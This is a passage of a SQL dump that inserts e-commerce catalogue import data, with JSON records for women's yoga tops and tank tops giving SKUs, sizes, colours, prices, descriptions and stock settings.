m_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(18, 'catalog_product', 'append', '{\"1700\":{\"sku\":\"WT05-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-XL-White\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1701\":{\"sku\":\"WT05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank|Camisole,material=Cotton|Polyester,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT05-XS-Orange,size=XS,color=Orange|sku=WT05-XS-Purple,size=XS,color=Purple|sku=WT05-XS-White,size=XS,color=White|sku=WT05-S-Orange,size=S,color=Orange|sku=WT05-S-Purple,size=S,color=Purple|sku=WT05-S-White,size=S,color=White|sku=WT05-M-Orange,size=M,color=Orange|sku=WT05-M-Purple,size=M,color=Purple|sku=WT05-M-White,size=M,color=White|sku=WT05-L-Orange,size=L,color=Orange|sku=WT05-L-Purple,size=L,color=Purple|sku=WT05-L-White,size=L,color=White|sku=WT05-XL-Orange,size=XL,color=Orange|sku=WT05-XL-Purple,size=XL,color=Purple|sku=WT05-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank|Camisole\",\"material\":\"Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"1702\":{\"sku\":\"WT06-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-XS-Blue\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1703\":{\"sku\":\"WT06-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-XS-Red\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1704\":{\"sku\":\"WT06-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-XS-Yellow\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1705\":{\"sku\":\"WT06-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-S-Blue\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1706\":{\"sku\":\"WT06-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-S-Red\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1707\":{\"sku\":\"WT06-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-S-Yellow\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1708\":{\"sku\":\"WT06-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-M-Blue\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 